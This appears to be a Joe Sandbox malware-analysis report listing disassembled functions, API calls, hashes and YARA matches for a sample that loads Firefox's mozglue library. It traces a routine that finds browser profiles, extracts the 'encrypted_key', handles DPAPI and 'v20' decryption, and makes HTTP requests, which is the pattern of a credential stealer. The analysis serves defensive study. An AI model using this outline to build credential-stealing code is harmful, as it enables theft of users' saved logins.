                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
                                                                                                                                                                                                                                                                                                                                  • String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1281939033-809102171
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 04a80694bfe92948c3c05774580c3a0cb2847f49fe3722c28cd9c839a0ea5ee3
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 9e4617f139495c078254cd5e12d3ac6a1b72213652c6d1ed577c7a4d9203a4ed
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 04a80694bfe92948c3c05774580c3a0cb2847f49fe3722c28cd9c839a0ea5ee3
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55412431B052109FDB11DF6AD8887AA7775EF8230EFA40019E90597F42CB319906CBEE
                                                                                                                                                                                                                                                                                                                                  Function 6C62D4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C62D4F0
                                                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C62D4FC
                                                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C62D52A
                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C62D530
                                                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C62D53F
                                                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C62D55F
                                                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C62D585
                                                                                                                                                                                                                                                                                                                                  • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C62D5D3
                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C62D5F9
                                                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C62D605
                                                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C62D652
                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C62D658
                                                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C62D667
                                                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C62D6A2
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2206442479-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 196273e0d89bbf890bdb52ea2f7363690837638b935a6b9f86d3e2da2325d5b6
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 73cc5812aa1e2ad56b50234df0af105450e43b78cca1fe9e9d92928e4fe98561
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 196273e0d89bbf890bdb52ea2f7363690837638b935a6b9f86d3e2da2325d5b6
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 93519A71604705EFC704DF35C888A9ABBF4FF89358F508A2EE94A97710DB34A845CB99
                                                                                                                                                                                                                                                                                                                                  Function 00415510 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 138stringCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004062D0: InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 00406331
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004062D0: StrCmpCA.SHLWAPI(?,007A20A8), ref: 00406353
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004062D0: HttpOpenRequestA.WININET(00000000,GET,?,007A1498,00000000,00000000,00400100,00000000), ref: 004063D5
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004062D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415568
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0041557F
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 004155B4
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 004155D3
                                                                                                                                                                                                                                                                                                                                  • strtok.MSVCRT(00000000,?), ref: 004155EE
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 004155FE
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                                                                                                                                                                                                                                                                                                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$lXA
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3532888709-2643084821
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b3ce40dcba526ecaf7cf8db34081b429585925911683ff95ca0f23da854036f4
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 990a636b304bf614e487c778196146b6daa8d27d3f5f6fae7c13381180e093e6
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b3ce40dcba526ecaf7cf8db34081b429585925911683ff95ca0f23da854036f4
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B7518030A11148EBCB14FF61DDA6AED7339AF10354F50442EF50A671A1EF386B94CB5A
                                                                                                                                                                                                                                                                                                                                  Function 004144D0 Relevance: 19.7, APIs: 13, Instructions: 202stringCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004144EE
                                                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00414505
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0041453C
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,007A0A10), ref: 0041455B
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 0041456F
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,007A0800), ref: 00414583
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418F20: GetFileAttributesA.KERNEL32(00000000,?,00410277,?,00000000,?,00000000,00420DB2,00420DAF), ref: 00418F2F
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0040A489
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A430: memcmp.MSVCRT(?,DPAPI,00000005), ref: 0040A4E2
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00419550: GlobalAlloc.KERNEL32(00000000,0041462D,0041462D), ref: 00419563
                                                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(?,007A1420), ref: 00414643
                                                                                                                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(?), ref: 00414762
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A23F
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A210: LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 0040A251
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A27A
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A210: LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 0040A28F
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 004146F3
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,004208D2), ref: 00414710
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 00414722
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(00000000,?), ref: 00414735
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(00000000,00420FA0), ref: 00414744
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1191620704-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d591eec1b5718dde1d34dedff36b0cc8a0112639f8ac3940ab52d9b4d9c63f7a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a18e5ba717d90c20c2426d83a13a237c0a2f648a3df755456e30f39b11c63a78
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d591eec1b5718dde1d34dedff36b0cc8a0112639f8ac3940ab52d9b4d9c63f7a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B77157B6D00218ABDB14EBA0DD45FDE737AAF88304F00459DF505A6191EB38EB94CF55
                                                                                                                                                                                                                                                                                                                                  Function 6C5F5670 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 272timeCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6C5F56D1
                                                                                                                                                                                                                                                                                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C5F56E9
                                                                                                                                                                                                                                                                                                                                  • ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6C5F56F1
                                                                                                                                                                                                                                                                                                                                  • ?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C5F5744
                                                                                                                                                                                                                                                                                                                                  • ??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6C5F57BC
                                                                                                                                                                                                                                                                                                                                  • GetTickCount64.KERNEL32 ref: 6C5F58CB
                                                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(6C65F688), ref: 6C5F58F3
                                                                                                                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 6C5F5945
                                                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(6C65F688), ref: 6C5F59B2
                                                                                                                                                                                                                                                                                                                                  • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6C65F638,?,?,?,?), ref: 6C5F59E9
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
                                                                                                                                                                                                                                                                                                                                  • String ID: MOZ_APP_RESTART
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2752551254-2657566371
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 013fe1f2d4307127260b8ab44edb2b9580edeea423a4f12b5007bba3db5e141e
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3993a73a985e7228754418fc0a024638683cec3c1b00afd32f6e60b43626766b
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 013fe1f2d4307127260b8ab44edb2b9580edeea423a4f12b5007bba3db5e141e
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1AC18E31A09740DFDB09CF29C88065ABBF1FFCA354F958A1DE4D457660D730A886CB86
                                                                                                                                                                                                                                                                                                                                  Function 6C61EC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C5E4A68), ref: 6C61945E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C619470
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C619420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C619482
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C619420: __Init_thread_footer.LIBCMT ref: 6C61949F
                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C61EC84
                                                                                                                                                                                                                                                                                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C61EC8C
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C6194D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6194EE
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C6194D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C619508
                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C61ECA1
                                                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(6C65F4B8), ref: 6C61ECAE
                                                                                                                                                                                                                                                                                                                                  • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6C61ECC5
                                                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C65F4B8), ref: 6C61ED0A
                                                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C61ED19
                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 6C61ED28
                                                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000), ref: 6C61ED2F
                                                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C65F4B8), ref: 6C61ED59
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  • [I %d/%d] profiler_ensure_started, xrefs: 6C61EC94
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                                                                                                                                                                                                                                                                  • String ID: [I %d/%d] profiler_ensure_started
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4057186437-125001283
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 70a1be703a02af6df98791a784be13c71a5d525f1c2b20087ca7538a9c356ec4
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6a1656a2faf969033ae06076eda4606af3c72a53ea480d86065bcaa933f2c1a7
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 70a1be703a02af6df98791a784be13c71a5d525f1c2b20087ca7538a9c356ec4
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1221F6716041049BDF01DF2ADC48AAA77B9EF8636EFA44210FD1497F41DB31D8168BAE
                                                                                                                                                                                                                                                                                                                                  Function 6C5FC570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C5FC5A3
                                                                                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32 ref: 6C5FC9EA
                                                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C5FC9FB
                                                                                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C5FCA12
                                                                                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5FCA2E
                                                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C5FCAA5
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: ByteCharMultiWidestrlen$freemalloc
                                                                                                                                                                                                                                                                                                                                  • String ID: (null)$0
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4074790623-38302674
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3d40baa6eccdc83b3afbedcfa6ddd471405385cd4749e11c038477b5f8197ae8
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 77fec1d1f78ecf1b974832e6b75ac76c7fffb63a22507b34b03b71bcfa9b0df6
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d40baa6eccdc83b3afbedcfa6ddd471405385cd4749e11c038477b5f8197ae8
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71A1A23060C3429FDB15DF29C98475ABBF1AF89748F04882DE9AA97741D771E806CF86
                                                                                                                                                                                                                                                                                                                                  Function 6C5D3480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
